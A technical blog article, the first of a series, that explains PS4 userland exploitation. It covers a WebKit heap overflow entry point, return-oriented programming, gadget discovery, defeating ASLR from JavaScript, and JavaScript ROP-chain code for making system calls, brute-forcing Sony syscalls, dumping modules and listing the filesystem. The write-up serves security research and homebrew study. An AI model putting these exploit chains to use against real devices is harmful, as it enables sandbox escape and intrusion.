    Hacking the PS4, part 1

    Introduction to PS4’s security, and userland ROP

    From: Cturt


    Note: This article is part of a 3 part series.

    See also: Analysis of sys_dynlib_prepare_dlclose PS4 kernel heap overflow

    Introduction

    Since there haven’t been any major public announcements regarding PS4 hacking for a long time now, I wanted to explain a bit about how far PS4 hacking has come, and what is preventing further progression.

    I will explain some security concepts that generally apply to all modern systems, and the discoveries that I have made from running ROP tests on my PS4.

    The goal of this series will be to present a full chain of exploits to ultimately gain kernel code execution on the PS4 by just visiting a web page on the Internet Browser.

    If you are not particularly familiar with exploitation, you should read my article about exploiting DS games through stack smash vulnerabilities in save files first.

    You may download my complete setup here to run these tests yourself; it is currently for firmware 1.76 only. If you are on an older firmware and wish to update to 1.76, you may download the 1.76 PUP file and update via USB.

    Background information about the PS4

    As you probably know, the PS4 features a custom AMD x86-64 CPU (8 cores), and there is a wealth of research available for this architecture, even if this specific version might deviate slightly from known standards. For example, PFLA (Page Fault Liberation Army) released a proof of concept implementing a complete Turing machine using only page faults and the x86 MMU during the 29C3 congress; check out their awesome video over at YouTube. It is also interesting if you are trying to run code within a virtual machine and want to execute instructions on the host CPU.

    As well as having a well documented CPU architecture, much of the software used in the PS4 is open source.

    Most notably, the PS4’s Orbis OS is based on FreeBSD (9.0), just like the PS3’s OS was (with parts of NetBSD as well); and includes a wide variety of additional open source software as well, such as Mono VM, and WebKit.

    WebKit entry point

    WebKit is the open source layout engine which renders web pages in the browsers for iOS, Wii U, 3DS, PS Vita, and the PS4.

    Although so widely used and mature, WebKit does have its share of vulnerabilities; you can learn about many of them by reading Pwn2Own write-ups.

    In particular, the browser in PS4 firmware 1.76 uses a version of WebKit which is vulnerable to CVE-2012-3748, a heap-based buffer overflow in the JSArray::sort(...) method.

    In 2014 nas and Proxima announced that they had successfully been able to port an exploit using this vulnerability, originally written for Mac OS X Safari, to the PS4’s internet browser, and released the PoC code publicly as the first entry point into hacking the PS4.

    This gives us arbitrary read and write access to everything the WebKit process can read and write to, which can be used to dump modules, and overwrite return addresses on the stack, letting us control the instruction pointer register (rip) to achieve ROP execution.

    Since then, many other vulnerabilities have been found in WebKit, which could probably be used as an entry point for later firmwares of the PS4, but as of writing, no one has ported any of these exploits to the PS4 publicly.

    If you have never signed into PSN, your PS4 won’t be able to open the Internet Browser; however, you can go to “Settings”, and then “User’s Guide”, to open a limited web browser view whose contents you can control with a proxy.

    What is ROP?

    Unlike in primitive devices like the DS, the PS4 has a kernel which controls the properties of different areas of memory. Pages of memory which are marked as executable cannot be overwritten, and pages of memory which are marked as writable cannot be executed; this is known as Data Execution Prevention (DEP).

    This means that we can’t just copy a payload into memory and execute it. However, we can execute code that is already loaded into memory and marked as executable.

    It wouldn’t be very useful to jump to a single address if we can’t write our own code to that address, so we use ROP.

    Return-Oriented Programming (ROP) is just an extension to traditional stack smashing, but instead of overwriting only a single value which rip will jump to, we can chain together many different addresses, known as gadgets.

    A gadget is usually just a single desired instruction followed by a ret.

    In x86_64 assembly, when a ret instruction is reached, a 64 bit value is popped off the stack and rip jumps to it; since we can control the stack, we can make every ret instruction jump to the next desired gadget.

    For example, the memory at 0x80000 may contain these instructions:

    mov rax, 0
    ret

    And the memory at 0x90000 may contain these instructions:

    mov rbx, 0
    ret

    If we overwrite a return address on the stack to contain 0x80000 followed by 0x90000, then as soon as the first ret instruction is reached execution will jump to mov rax, 0, and immediately afterwards, the next ret instruction will pop 0x90000 off the stack and jump to mov rbx, 0.

    Effectively this chain will set both rax and rbx to 0, just as if we had written the code into a single location and executed it from there.

    ROP chains aren’t just limited to a list of addresses though; assuming that the memory at 0xa0000 contains these instructions:

    pop rax
    ret

    We can set the first item in the chain to 0xa0000 and the next item to any desired value for rax.

    Gadgets also don’t have to end in a ret instruction; we can use gadgets ending in a jmp:

    add rax, 8
    jmp rcx

    By making rcx point to a ret instruction, the chain will continue as normal:

    chain.add("pop rcx", "ret");
    chain.add("add rax, 8; jmp rcx");

    Sometimes you won’t be able to find the exact gadget that you need on its own, but with other instructions after it. For example, if you want to set r8 to something, but only have this gadget, you will have to set r9 to some dummy value:

    pop r8
    pop r9
    ret

    Although you may have to be creative with how you write ROP chains, it is generally accepted that a sufficiently large code dump will contain enough gadgets for Turing-complete functionality; this makes ROP a viable method of defeating DEP.

    Finding gadgets

    Think of ROP as writing a new chapter to a book, using only words that have appeared at the end of sentences in the previous chapters.

    It’s obvious from the structure of most sentences that we probably won’t be able to find words like ‘and’ or ‘but’ appearing at the end of any sentences, but we will need these connectives in order to write anything meaningful.

    It is quite possible however, that a sentence has ended with ‘sand’. Although the author only ever intended for the word to be read from the ‘s’, if we start reading from the ‘a’, it will appear as an entirely different word by coincidence, ‘and’.

    These principles also apply to ROP.

    Since almost all functions are structured with a prologue and epilogue:

    ; Save registers
    push    rbp
    mov     rbp, rsp
    push    r15
    push    r14
    push    r13
    push    r12
    push    rbx
    sub     rsp, 18h
    
    ; Function body
    
    ; Restore registers
    add     rsp, 18h
    pop     rbx
    pop     r12
    pop     r13
    pop     r14
    pop     r15
    pop     rbp
    ret

    You’d expect to only be able to find pop gadgets, or more rarely, something like xor rax, rax to set the return value to 0 before returning.

    Having a comparison like:

    cmp [rax], r12
    ret

    Wouldn’t make any sense since the result of the comparison isn’t used by the function. However, there is still a possibility that we can find gadgets like these.

    x86_64 instructions are similar to words in that they have variable lengths, and can mean something entirely different depending on where decoding starts.

    The x86_64 architecture is a variable-length CISC instruction set. Return-oriented programming on the x86_64 takes advantage of the fact that the instruction set is very “dense”, that is, any random sequence of bytes is likely to be interpretable as some valid set of x86_64 instructions.

    To demonstrate this, take a look at the end of this function from the WebKit module:

    000000000052BE0D                 mov     eax, [rdx+8]
    000000000052BE10                 mov     [rsi+10h], eax
    000000000052BE13                 or      byte ptr [rsi+39h], 20h
    000000000052BE17                 ret

    Now take a look at what the code looks like if we start decoding from 0x52be14:

    000000000052BE14                 cmp     [rax], r12
    000000000052BE17                 ret

    Even though this code was never intended to be executed, it is within an area of memory which has been marked as executable, so it is perfectly valid to use as a gadget.

    Of course, it would be incredibly time consuming to look at every possible way of interpreting code before every single ret instruction manually; that’s why tools exist to do this for you. The one which I use to search for ROP gadgets is rp++; to generate a text file filled with gadgets, just use:

    rp-win-x64 -f mod14.bin --raw=x64 --rop=1 --unique > mod14.txt

    General protection faults

    If we perform an access violation, such as trying to execute a non-executable page of memory, or trying to write to a non-writable page of memory, a general protection fault (or, more specifically in this instance, a segmentation fault) will occur.

    For example, trying to execute code on the stack, which is mapped as read and write only:

    setU8to(chain.data + 0, 0xeb); // 0xEB 0xFE encodes "jmp $", a two byte infinite loop
    setU8to(chain.data + 1, 0xfe);
    
    chain.add(chain.data);         // return into the writable (non-executable) data

    And trying to write to code, which is mapped as read and execute only:

    setU8to(moduleBases[webkit], 0); // overwrite the first byte of the WebKit module's code

    If a general protection fault occurs, a message saying "There is not enough free system memory" will appear, and the page will fail to load.

    This message will also be displayed for other hard faults, such as division by 0, or execution of an invalid instruction or unimplemented system call, but most commonly it will be encountered by performing a segmentation fault.

    ASLR

    Address Space Layout Randomization (ASLR) is a security technique which causes the base addresses of modules to be different every time you start the PS4.

    It has been reported to me that very old firmwares (1.05) don’t have ASLR enabled, but it was introduced sometime before firmware 1.70. Note that kernel ASLR is not enabled (for firmwares 1.76 and lower at least), which will be proved later in the article.

    For most exploits ASLR would be a problem because if you don’t know the addresses of the gadgets in memory, you would have no idea what to write to the stack.

    Luckily for us, we aren’t limited to just writing static ROP chains. We can use JavaScript to read the modules table, which will tell us the base addresses of all loaded modules. Using these bases, we can then calculate the addresses of all our gadgets before we trigger ROP execution, defeating ASLR.
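    For example (a sketch only, reusing the moduleBases table from the segfault example above and the cmp [rax], r12 ; ret gadget found at offset 0x52be14 of the WebKit module earlier; the variable names are illustrative), a gadget address is simply the leaked module base plus a known offset:

    // Resolve gadget addresses at runtime, so that ASLR only changes the bases,
    // never the offsets within each module.
    var webKitBase = moduleBases[webkit];
    var gadget_cmp_rax_r12 = webKitBase + 0x52be14; // "cmp [rax], r12; ret"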

    The modules table also includes the filenames of the modules:

    • WebProcess.self
    • libkernel.sprx
    • libSceLibcInternal.sprx
    • libSceSysmodule.sprx
    • libSceNet.sprx
    • libSceNetCtl.sprx
    • libSceIpmi.sprx
    • libSceMbus.sprx
    • libSceRegMgr.sprx
    • libSceRtc.sprx
    • libScePad.sprx
    • libSceVideoOut.sprx
    • libScePigletv2VSH.sprx
    • libSceOrbisCompat.sprx
    • libSceWebKit2.sprx
    • libSceSysCore.sprx
    • libSceSsl.sprx
    • libSceVideoCoreServerInterface.sprx
    • libSceSystemService.sprx
    • libSceCompositeExt.sprx

    Although the PS4 predominantly uses the [S]igned PPU Relocatable Executable ([S]PRX) format for modules, some string references to [S]igned Executable and Linking Format ([S]ELF) object files can also be found in the libSceSysmodule.sprx dump, such as bdj.elf, web_core.elf and orbis-jsc-compiler.self. This combination of modules and objects is similar to what is used in the PSP and PS3.

    You can view a complete list of all modules available (not just those loaded by the browser) in libSceSysmodule.sprx. We can load and dump some of these through several of Sony’s custom system calls, which will be explained later in this article.

    JuSt-ROP

    Using JavaScript to write and execute dynamic ROP chains gives us a tremendous advantage over a traditional, static buffer overflow attack.

    As well as being necessary to defeat ASLR, JavaScript also lets us read the user agent of the browser, and provide different ROP chains for different browser versions, giving our exploit a greater range of compatibility.

    We can even use JavaScript to read the memory at our gadgets’ addresses to check that they are correct, giving us almost perfect reliability. Theoretically, you could take this even further by writing a script to dynamically find ROP gadgets and then build ROP chains on the fly.

    Writing ROP chains dynamically, rather than generating them with a script beforehand, just makes sense.

    I created a JavaScript framework for writing ROP chains, JuSt-ROP, for this very reason.

    JavaScript caveats

    JavaScript represents numbers using the IEEE-754 double-precision (64 bit) format. This provides us with 53 bits of precision, meaning that it isn’t possible to represent every 64 bit value; approximations will have to be used for some.

    If you just need to set a 64 bit value to something low, like 256, then setU64to will be fine.

    But for situations in which you need to write a buffer or struct of data, there is the possibility that certain bytes will be written incorrectly if the data is written in 64 bit chunks.

    Instead, you should write data in 32 bit chunks (remembering that the PS4 is little endian), to ensure that every byte is exact.
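    For example (a minimal sketch, assuming a setU32to helper alongside the setU8to and setU64to helpers used elsewhere in this article), a 64 bit value can be written exactly as two 32 bit halves:

    // Write the 64 bit value 0x0123456789abcdef exactly, in two 32 bit chunks;
    // the PS4 is little endian, so the low half is written first.
    setU32to(chain.data + 0, 0x89abcdef); // low 32 bits
    setU32to(chain.data + 4, 0x01234567); // high 32 bits
    
    // Writing the same value with setU64to could silently lose the low bits,
    // since 0x0123456789abcdef cannot be represented exactly in a 53 bit mantissa.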

    System calls

    Interestingly, the PS4 uses the same calling convention as Linux and MS-DOS for system calls, with arguments passed in registers, rather than the traditional UNIX way (which FreeBSD uses by default), with arguments passed on the stack:

    • rax - System call number
    • rdi - Argument 1
    • rsi - Argument 2
    • rdx - Argument 3
    • r10 - Argument 4
    • r8 - Argument 5
    • r9 - Argument 6

    We can try to perform any system call with the following JuSt-ROP method:

    this.syscall = function(name, systemCallNumber, arg1, arg2, arg3, arg4, arg5, arg6) {
        console.log("syscall " + name);
    
        this.add("pop rax", systemCallNumber);
        if(typeof(arg1) !== "undefined") this.add("pop rdi", arg1);
        if(typeof(arg2) !== "undefined") this.add("pop rsi", arg2);
        if(typeof(arg3) !== "undefined") this.add("pop rdx", arg3);
        if(typeof(arg4) !== "undefined") this.add("pop rcx", arg4);
        if(typeof(arg5) !== "undefined") this.add("pop r8", arg5);
        if(typeof(arg6) !== "undefined") this.add("pop r9", arg6);
        this.add("mov r10, rcx; syscall");
    }

    Just make sure to set the stack base to some free memory beforehand:

    this.add("pop rbp", stackBase + returnAddress + 0x1400);

    Using system calls can tell us a huge amount about the PS4 kernel. Not only that, but using system calls is most likely the only way that we can interact with the kernel, and thus potentially trigger a kernel exploit.

    If you are reverse engineering modules to identify some of Sony’s custom system calls, you may come across an alternative calling convention:

    Sometimes Sony performs system calls through regular system call 0 (which usually does nothing in FreeBSD), with the first argument (rdi) controlling which system call should be executed:

    • rax - 0
    • rdi - System call number
    • rsi - Argument 1
    • rdx - Argument 2
    • r10 - Argument 3
    • r8 - Argument 4
    • r9 - Argument 5

    It is likely that Sony did this to have easy compatibility with the function calling convention. For example:

    .global syscall
    syscall:
        xor     rax, rax
        mov     r10, rcx
        syscall
        ret
    

    Using this, they can perform system calls from C using the function calling convention:

    int syscall();
    
    int getpid(void) {
        return syscall(20);
    }

    When writing ROP chains, we can use either convention:

    // Both will get the current process ID:
    chain.syscall("getpid", 20);
    chain.syscall("getpid", 0, 20);

    It’s good to be aware of this, because we can use whichever one is more convenient for the gadgets that are available.

    getpid

    Just by using system call 20, getpid(void), we can learn a lot about the kernel.

    The very fact that this system call works at all tells us that Sony didn’t bother mixing up the system call numbers as a means of security through obscurity (under the BSD license they could have done this without releasing the new system call numbers).

    So, we automatically have a list of system calls in the PS4 kernel to try.

    Secondly, by calling getpid(), restarting the browser, and calling it again, we get a return value 2 higher than the previous value.

    This tells us that the Internet Browser app actually consists of 2 separate processes: the WebKit core (which we take over), that handles parsing HTML and CSS, decoding images, and executing JavaScript for example, and another one to handle everything else: displaying graphics, receiving controller input, managing history and bookmarks, etc.

    Also, although FreeBSD has supported PID randomisation since 4.0, sequential PID allocation is the default behaviour.

    The fact that PID allocation is set to the default behaviour indicates that Sony likely didn’t bother adding any additional security enhancements such as those encouraged by projects like HardenedBSD, other than userland ASLR.

    How many custom system calls are there?

    The last standard FreeBSD 9 system call is wait6, number 532; anything higher than this must be a custom Sony system call.

    Invoking most of Sony’s custom system calls without the correct arguments will return error 0x16, "Invalid argument"; however, any compatibility or unimplemented system calls will report the “There is not enough free system memory” error.

    Through trial and error, I have found that system call number 617 is the last Sony system call, anything higher is unimplemented.

    From this, we can conclude that there are 85 custom Sony system calls in the PS4’s kernel (617 - 532).

    libkernel.sprx

    To identify how custom system calls are used by libkernel, you must first remember that it is just a modification of the standard FreeBSD 9.0 libraries.

    Here’s an extract of _libpthread_init from thr_init.c:

    /*
     * Check for the special case of this process running as
     * or in place of init as pid = 1:
     */
    if ((_thr_pid = getpid()) == 1) {
        /*
         * Setup a new session for this process which is
         * assumed to be running as root.
         */
        if (setsid() == -1)
            PANIC("Can't set session ID");
        if (revoke(_PATH_CONSOLE) != 0)
            PANIC("Can't revoke console");
        if ((fd = __sys_open(_PATH_CONSOLE, O_RDWR)) < 0)
            PANIC("Can't open console");
        if (setlogin("root") == -1)
            PANIC("Can't set login to root");
        if (_ioctl(fd, TIOCSCTTY, (char *) NULL) == -1)
            PANIC("Can't set controlling terminal");
    }

    The same function can be found at offset 0x215F0 from libkernel.sprx. This is how the above extract looks from within a libkernel dump:

    call    getpid
    mov     cs:dword_5B638, eax
    cmp     eax, 1
    jnz     short loc_2169F
    
    call    setsid
    cmp     eax, 0FFFFFFFFh
    jz      loc_21A0C
    
    lea     rdi, aDevConsole ; "/dev/console"
    call    revoke
    test    eax, eax
    jnz     loc_21A24
    
    lea     rdi, aDevConsole ; "/dev/console"
    mov     esi, 2
    xor     al, al
    call    open
    
    mov     r14d, eax
    test    r14d, r14d
    js      loc_21A3C
    lea     rdi, aRoot       ; "root"
    call    setlogin
    cmp     eax, 0FFFFFFFFh
    jz      loc_21A54
    
    mov     edi, r14d
    mov     esi, 20007461h
    xor     edx, edx
    xor     al, al
    call    ioctl
    cmp     eax, 0FFFFFFFFh
    jz      loc_21A6C

    Reversing module dumps to analyse system calls

    libkernel isn’t completely open source though; there’s also a lot of custom code which can help disclose some of Sony’s system calls.

    This process will vary depending on the system call you are looking up, but for some it is fairly easy to get a basic understanding of the arguments that are passed to them.

    The system call wrapper will be declared somewhere in libkernel.sprx, and will almost always follow this template:

    000000000000DB70 syscall_601     proc near
    000000000000DB70                 mov     rax, 259h
    000000000000DB77                 mov     r10, rcx
    000000000000DB7A                 syscall
    000000000000DB7C                 jb      short error
    000000000000DB7E                 retn
    000000000000DB7F
    000000000000DB7F error:
    000000000000DB7F                 lea     rcx, sub_DF60
    000000000000DB86                 jmp     rcx
    000000000000DB86 syscall_601     endp

    Note that the mov r10, rcx instruction doesn’t necessarily mean that the system call takes at least 4 arguments; all system call wrappers have it, even those that take no arguments, such as getpid.

    Once you’ve found the wrapper, you can look up xrefs to it:

    0000000000011D50                 mov     edi, 10h
    0000000000011D55                 xor     esi, esi
    0000000000011D57                 mov     edx, 1
    0000000000011D5C                 call    syscall_601
    0000000000011D61                 test    eax, eax
    0000000000011D63                 jz      short loc_11D6A

    It’s good to look up several of these, just to make sure that the registers weren’t modified for something unrelated:

    0000000000011A28                 mov     edi, 9
    0000000000011A2D                 xor     esi, esi
    0000000000011A2F                 xor     edx, edx
    0000000000011A31                 call    syscall_601
    0000000000011A36                 test    eax, eax
    0000000000011A38                 jz      short loc_11A3F

    Consistently, the first three registers of the system call convention (rdi, rsi, and rdx) are modified before invoking the call, so we can conclude with reasonable confidence that it takes 3 arguments.

    For clarity, this is how we would replicate the calls in JuSt-ROP:

    chain.syscall("unknown", 601, 0x10, 0, 1);
    chain.syscall("unknown", 601, 9, 0, 0);

    As with most system calls, it will return 0 on success, as seen by the jz conditional after testing the return value.

    Looking up anything beyond the number of arguments will require a much more in-depth analysis of the code before and after the call to understand the context, but this should help you get started.

    Brute forcing system calls

    Although reverse engineering module dumps is the most reliable way to identify system calls, some aren’t referenced at all in the dumps we have, so we will need to analyse them blindly.

    If we guess that a certain system call might take a particular set of arguments, we can brute force all system calls which return a certain value (0 for success) with the arguments that we chose, and ignore all which returned an error.

    We can also pass 0s for all arguments, and brute force all system calls which return useful errors such as 0xe, "Bad address", which would indicate that they take at least one pointer.

    Firstly, we will need to execute the ROP chain as soon as the page loads. We can do this by attaching our function to the body element’s onload:

    <body onload="exploit()">

    Next we will need to perform a specific system call depending on an HTTP GET value. Although this can be done with JavaScript, I will demonstrate how to do this using PHP for simplicity:

    var Sony = 533;
    chain.syscall("Sony system call", Sony + <?php print($_GET["b"]); ?>, 0, 0, 0, 0, 0, 0);
    chain.write_rax_ToVariable(0);

    Once the system call has executed, we can check the return value, and if it isn’t interesting, redirect the page to the next system call:

    if(chain.getVariable(0) == 0x16) window.location.assign("index.php?b=" + (<?php print($_GET["b"]); ?> + 1).toString());
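    For reference, a pure JavaScript version of the same loop could look roughly like this (a sketch, reusing the chain.execute callback style shown later in this article; details may differ slightly in the real setup):

    // Read the current index from the query string instead of using PHP.
    var b = parseInt(window.location.search.replace("?b=", ""), 10) || 0;
    var Sony = 533;
    
    chain.syscall("Sony system call", Sony + b, 0, 0, 0, 0, 0, 0);
    chain.write_rax_ToVariable(0);
    
    chain.execute(function() {
        var result = chain.getVariable(0);
        
        // Skip "Invalid argument" results, and log anything more interesting.
        if(result == 0x16) window.location.assign("index.php?b=" + (b + 1).toString());
        else logAdd("System call " + (Sony + b) + " returned 0x" + result.toString(16));
    });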

    Running the page with ?b=0 appended to the end will start the brute force from the first Sony system call.

    Although this method requires a lot of experimentation, by passing different values to some of the system calls found by brute forcing and analysing the new return values, there are a few system calls which you should be able to partially identify.

    System call 538

    As an example, I’ll take a look at system call 538, without relying on any module dumps.

    These are the return values depending on what is passed as the first argument:

    • 0 - 0x16, "Invalid argument"
    • 1 - 0xe, "Bad address"
    • Pointer to 0s - 0x64 initially, but each time the page is refreshed this value increases by 1

    Other potential arguments to try would be PID, thread ID, and file descriptor.

    Although most system calls will return 0 on success, due to the nature of the return value increasing after each time it is called, it seems like it is allocating a resource number, such as a file descriptor.

    The next thing to do would be to look at the data before and after performing the system call, to see if it has been written to.
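    One way to do this (a sketch using the hexDump and logAdd helpers shown elsewhere in this article) is to dump the buffer, perform the call, and then dump it again:

    // Dump the buffer before the system call runs...
    logAdd(hexDump(chain.data, 0x20));
    
    chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0);
    
    chain.execute(function() {
        // ...and again afterwards, to see whether the kernel wrote anything back.
        logAdd(hexDump(chain.data, 0x20));
    });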

    Since there is no change in the data, we can assume that it is an input for now.

    I then tried passing a long string as the first argument. You should always try this with every input you find because there is the possibility of discovering a buffer overflow.

    writeString(chain.data, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
    chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0);

    The return value for this is 0x3f, ENAMETOOLONG. Unfortunately it seems that this system call correctly limits the name (32 bytes including the NULL terminator), but it does tell us that it is expecting a string, rather than a struct.

    We now have a few possibilities for what this system call is doing, the most obvious being something related to the filesystem (such as a custom mkdir or open), but this doesn’t seem particularly likely seeing as a resource was allocated even before we wrote any data to the pointer.

    To test whether the first parameter is a path, we can break it up with multiple / characters to see if this allows for a longer string:

    writeString(chain.data, "aaaaaaaaaa/aaaaaaaaaa/aaaaaaaaaa");
    chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0);

    Since this also returns 0x3f, we can assume that the first argument isn’t a path; it is a name for something that gets allocated a sequential identifier.

    After analysing some more system calls, I found that the following all shared this exact same behaviour:

    • 533
    • 538
    • 557
    • 574
    • 580

    From the information that we have so far, it is almost impossible to pinpoint exactly what these system calls do, but as you run more tests, further information will slowly be revealed.

    To save you some time, system call 538 is allocating an event flag (and it doesn’t just take a name).

    Using general knowledge of how a kernel works, you can guess, and then verify, what the system calls are allocating (semaphores, mutexes, etc).

    Dumping additional modules

    We can dump additional modules by following these stages:

    • Load the module
    • Get the module’s base address
    • Dump the module

    I’ve extracted and posted a list of all module names on psdevwiki.

    To load a module we will need to use the sceSysmoduleLoadModule function from libSceSysmodule.sprx + 0x1850. The first parameter is the module ID to load, and the other 3 should just be passed 0.

    The following JuSt-ROP method can be used to perform a function call:

    this.call = function(name, module, address, arg1, arg2, arg3, arg4, arg5, arg6) {
        console.log("call " + name);
    
        if(typeof(arg1) !== "undefined") this.add("pop rdi", arg1);
        if(typeof(arg2) !== "undefined") this.add("pop rsi", arg2);
        if(typeof(arg3) !== "undefined") this.add("pop rdx", arg3);
        if(typeof(arg4) !== "undefined") this.add("pop rcx", arg4);
        if(typeof(arg5) !== "undefined") this.add("pop r8", arg5);
        if(typeof(arg6) !== "undefined") this.add("pop r9", arg6);
        this.add(module_bases[module] + address);
    }

    So, to load libSceAvSetting.sprx (0xb):

    chain.call("sceSysmoduleLoadModule", libSysmodule, 0x1850, 0xb, 0, 0, 0);

    Unfortunately, a fault will be triggered when trying to load certain modules; this is because the sceSysmoduleLoadModule function doesn’t load dependencies, so you will need to manually load them first.

    Like most system calls, this should return 0 on success. To see the loaded module ID that was allocated, we can use one of Sony’s custom system calls, number 592, to get a list of currently loaded modules:

    var countAddress = chain.data;
    var modulesAddress = chain.data + 8;
    
    // System call 592, getLoadedModules(int *destinationModuleHandles, int max, int *count);
    chain.syscall("getLoadedModules", 592, modulesAddress, 256, countAddress);
    
    chain.execute(function() {
        var count = getU64from(countAddress);
        for(var index = 0; index < count; index++) {
            logAdd("Module handle: 0x" + getU32from(modulesAddress + index * 4).toString(16));
        }
    });

    Running this without loading any additional modules will produce the following list:

    0x0, 0x1, 0x2, 0xc, 0xe, 0xf, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1e, 0x37, 0x59

    But if we run it after loading module 0xb, we will see an additional entry, 0x65. Remember that module ID is not the same as loaded module handle.

    We can now use another of Sony’s custom system calls, number 593, which takes a module handle and a buffer, and fills the buffer with information about the loaded module, including its base address. Since the next available handle is always 0x65, we can hardcode this value into our chain, rather than having to store the result from the module list.

    The buffer must start with the size of the struct that should be returned, otherwise error 0x16 will be returned, "Invalid argument":

    setU64to(moduleInfoAddress, 0x160);
    chain.syscall("getModuleInfo", 593, 0x65, moduleInfoAddress);
    
    chain.execute(function() {
        logAdd(hexDump(moduleInfoAddress, 0x160));
    });

    It will return 0 upon success, and fill the buffer with a struct which can be read like so:

    var name = readString(moduleInfoAddress + 0x8);
    var codeBase = getU64from(moduleInfoAddress + 0x108);
    var codeSize = getU32from(moduleInfoAddress + 0x110);
    var dataBase = getU64from(moduleInfoAddress + 0x118);
    var dataSize = getU32from(moduleInfoAddress + 0x120);

    We now have everything we need to dump the module!

    dump(codeBase, codeSize + dataSize);
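    The dump helper itself is not shown in this article; a minimal stand-in could be as simple as hex dumping the range in chunks (a sketch only; the real setup may output the data differently, for example over the network):

    // Hex dump an arbitrary memory range in 256 byte chunks.
    function dump(base, size) {
        for(var offset = 0; offset < size; offset += 0x100) {
            logAdd(hexDump(base + offset, Math.min(0x100, size - offset)));
        }
    }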

    There is another Sony system call, number 608, which works in a similar way to 593, but provides slightly different information about the loaded module:

    setU64to(moduleInfoAddress, 0x1a8);
    chain.syscall("getDifferentModuleInfo", 608, 0x65, 0, moduleInfoAddress);
    logAdd(hexDump(moduleInfoAddress, 0x1a8));

    It’s not clear what this information is.

    Browsing the filesystem

    The PS4 uses the standard FreeBSD 9.0 system calls for reading files and directories.

    However, whilst read will work for some directories, such as /dev/, it will fail for others, such as /.

    I’m not sure why this is, but if we use getdents instead of read for directories, it will work much more reliably:

    writeString(chain.data, "/dev/");
    chain.syscall("open", 5, chain.data, 0, 0);
    chain.write_rax_ToVariable(0);
    
    chain.read_rdi_FromVariable(0);
    chain.syscall("getdents", 272, undefined, chain.data + 0x10, 1028);

    This is the resultant memory:

    0000010: 0700 0000 1000 0205 6469 7073 7700 0000  ........dipsw...
    0000020: 0800 0000 1000 0204 6e75 6c6c 0000 0000  ........null....
    0000030: 0900 0000 1000 0204 7a65 726f 0000 0000  ........zero....
    0000040: 0301 0000 0c00 0402 6664 0000 0b00 0000  ........fd......
    0000050: 1000 0a05 7374 6469 6e00 0000 0d00 0000  ....stdin.......
    0000060: 1000 0a06 7374 646f 7574 0000 0f00 0000  ....stdout......
    0000070: 1000 0a06 7374 6465 7272 0000 1000 0000  ....stderr......
    0000080: 1000 0205 646d 656d 3000 0000 1100 0000  ....dmem0.......
    0000090: 1000 0205 646d 656d 3100 0000 1300 0000  ....dmem1.......
    00000a0: 1000 0206 7261 6e64 6f6d 0000 1400 0000  ....random......
    00000b0: 1000 0a07 7572 616e 646f 6d00 1600 0000  ....urandom.....
    00000c0: 1400 020b 6465 6369 5f73 7464 6f75 7400  ....deci_stdout.
    00000d0: 1700 0000 1400 020b 6465 6369 5f73 7464  ........deci_std
    00000e0: 6572 7200 1800 0000 1400 0209 6465 6369  err.........deci
    00000f0: 5f74 7479 3200 0000 1900 0000 1400 0209  _tty2...........
    0000100: 6465 6369 5f74 7479 3300 0000 1a00 0000  deci_tty3.......
    0000110: 1400 0209 6465 6369 5f74 7479 3400 0000  ....deci_tty4...
    0000120: 1b00 0000 1400 0209 6465 6369 5f74 7479  ........deci_tty
    0000130: 3500 0000 1c00 0000 1400 0209 6465 6369  5...........deci
    0000140: 5f74 7479 3600 0000 1d00 0000 1400 0209  _tty6...........
    0000150: 6465 6369 5f74 7479 3700 0000 1e00 0000  deci_tty7.......
    0000160: 1400 020a 6465 6369 5f74 7479 6130 0000  ....deci_ttya0..
    0000170: 1f00 0000 1400 020a 6465 6369 5f74 7479  ........deci_tty
    0000180: 6230 0000 2000 0000 1400 020a 6465 6369  b0.. .......deci
    0000190: 5f74 7479 6330 0000 2200 0000 1400 020a  _ttyc0..".......
    00001a0: 6465 6369 5f73 7464 696e 0000 2300 0000  deci_stdin..#...
    00001b0: 0c00 0203 6270 6600 2400 0000 1000 0a04  ....bpf.$.......
    00001c0: 6270 6630 0000 0000 2900 0000 0c00 0203  bpf0....).......
    00001d0: 6869 6400 2c00 0000 1400 0208 7363 655f  hid.,.......sce_
    00001e0: 7a6c 6962 0000 0000 2e00 0000 1000 0204  zlib............
    00001f0: 6374 7479 0000 0000 3400 0000 0c00 0202  ctty....4.......
    0000200: 6763 0000 3900 0000 0c00 0203 6463 6500  gc..9.......dce.
    0000210: 3a00 0000 1000 0205 6462 6767 6300 0000  :.......dbggc...
    0000220: 3e00 0000 0c00 0203 616a 6d00 4100 0000  >.......ajm.A...
    0000230: 0c00 0203 7576 6400 4200 0000 0c00 0203  ....uvd.B.......
    0000240: 7663 6500 4500 0000 1800 020d 6e6f 7469  vce.E.......noti
    0000250: 6669 6361 7469 6f6e 3000 0000 4600 0000  fication0...F...
    0000260: 1800 020d 6e6f 7469 6669 6361 7469 6f6e  ....notification
    0000270: 3100 0000 5000 0000 1000 0206 7573 6263  1...P.......usbc
    0000280: 746c 0000 5600 0000 1000 0206 6361 6d65  tl..V.......came
    0000290: 7261 0000 8500 0000 0c00 0203 726e 6700  ra..........rng.
    00002a0: 0701 0000 0c00 0403 7573 6200 c900 0000  ........usb.....
    00002b0: 1000 0a07 7567 656e 302e 3400 0000 0000  ....ugen0.4.....
    00002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................

    You can read some of these devices, for example: reading /dev/urandom will fill the memory with random data.

    It is also possible to parse this memory to create a clean list of entries; look at browser.html in the repository for a complete file browser.
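    As a rough illustration (a sketch only, assuming the standard FreeBSD 9 struct dirent layout visible in the hex dump above: a 32 bit file number, a 16 bit record length, an 8 bit type, an 8 bit name length, then the NULL terminated name), the buffer can be walked like this:

    // Walk the getdents buffer entry by entry and log each file name.
    var entry = chain.data + 0x10;
    var end = entry + 1028;
    
    while(entry < end) {
        var fileno = getU32from(entry);              // d_fileno
        var reclen = getU32from(entry + 4) & 0xffff; // d_reclen (d_type and d_namlen follow)
        
        if(fileno == 0 || reclen == 0) break;        // no more valid entries
        
        logAdd(readString(entry + 8));               // d_name
        entry += reclen;
    }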

    Unfortunately, due to sandboxing we don’t have complete access to the file system. Trying to read files and directories that do exist but are restricted will give you error 2, ENOENT, "No such file or directory".

